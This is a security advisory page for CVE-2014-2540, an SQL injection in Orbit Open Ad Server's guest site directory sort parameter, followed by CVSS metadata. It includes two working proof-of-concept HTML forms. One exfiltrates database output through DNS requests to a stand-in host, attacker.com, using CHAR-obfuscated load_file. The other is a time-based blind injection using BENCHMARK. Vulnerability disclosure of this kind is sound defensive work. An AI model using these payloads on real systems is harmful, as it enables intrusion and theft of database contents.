Lucene search

High-Tech BridgeHTB23208

HistoryMar 19, 2014 - 12:00 a.m.

SQL Injection in Orbit Open Ad Server

2014-03-1900:00:00

High-Tech Bridge

www.htbridge.com

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

41.0%

JSON

High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website.

SQL Injection in Orbit Open Ad Server: CVE-2014-2540
Input passed via the “site_directory_sort_field” HTTP POST parameter to “/guest/site_directory” URL is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version() (or any other sensetive output from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):
<form action=“http://[host]/guest/site_directory” method=“post” name=“main”>
<input type=“hidden” name=“active_form” value=“site_directory_form”>
<input type=“hidden” name=“ad_type_filter” value=“text”>
<input type=“hidden” name=“category_filter” value=“1”>
<input type=“hidden” name=“cost_model_filter” value=“cpm”>
<input type=“hidden” name=“form_mode” value=“save”>
<input type=“hidden” name=“image_size_filter” value=“12”>
<input type=“hidden” name=“keyword_filter” value=“1”>
<input type=“hidden” name=“site_directory_page” value=“1”>
<input type=“hidden” name=“site_directory_per_page” value=“10”>
<input type=“hidden” name=“site_directory_sort_direction” value=“asc”>
<input type=“hidden” name=“site_directory_sort_field” value=“(select load_file(CONCAT(CHAR(92), CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111), CHAR(111),CHAR(98),CHAR(97),CHAR(114))))”>
<input type=“submit” id=“btn”>
</form>
The second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database:
<form action=“http://[host]/guest/site_directory” method=“post” name=“main”>
<input type=“hidden” name=“active_form” value=“site_directory_form”>
<input type=“hidden” name=“ad_type_filter” value=“text”>
<input type=“hidden” name=“category_filter” value=“1”>
<input type=“hidden” name=“cost_model_filter” value=“cpm”>
<input type=“hidden” name=“form_mode” value=“save”>
<input type=“hidden” name=“image_size_filter” value=“12”>
<input type=“hidden” name=“keyword_filter” value=“1”>
<input type=“hidden” name=“site_directory_page” value=“1”>
<input type=“hidden” name=“site_directory_per_page” value=“10”>
<input type=“hidden” name=“site_directory_sort_direction” value=“asc”>
<input type=“hidden” name=“site_directory_sort_field” value=“(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))”>
<input type=“submit” id=“btn”>
</form>

CPENameOperatorVersion
orbit open ad serverle1.1.0

CPE	Name	Operator	Version
	orbit open ad server	le	1.1.0

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

41.0%

JSON

Related for HTB23208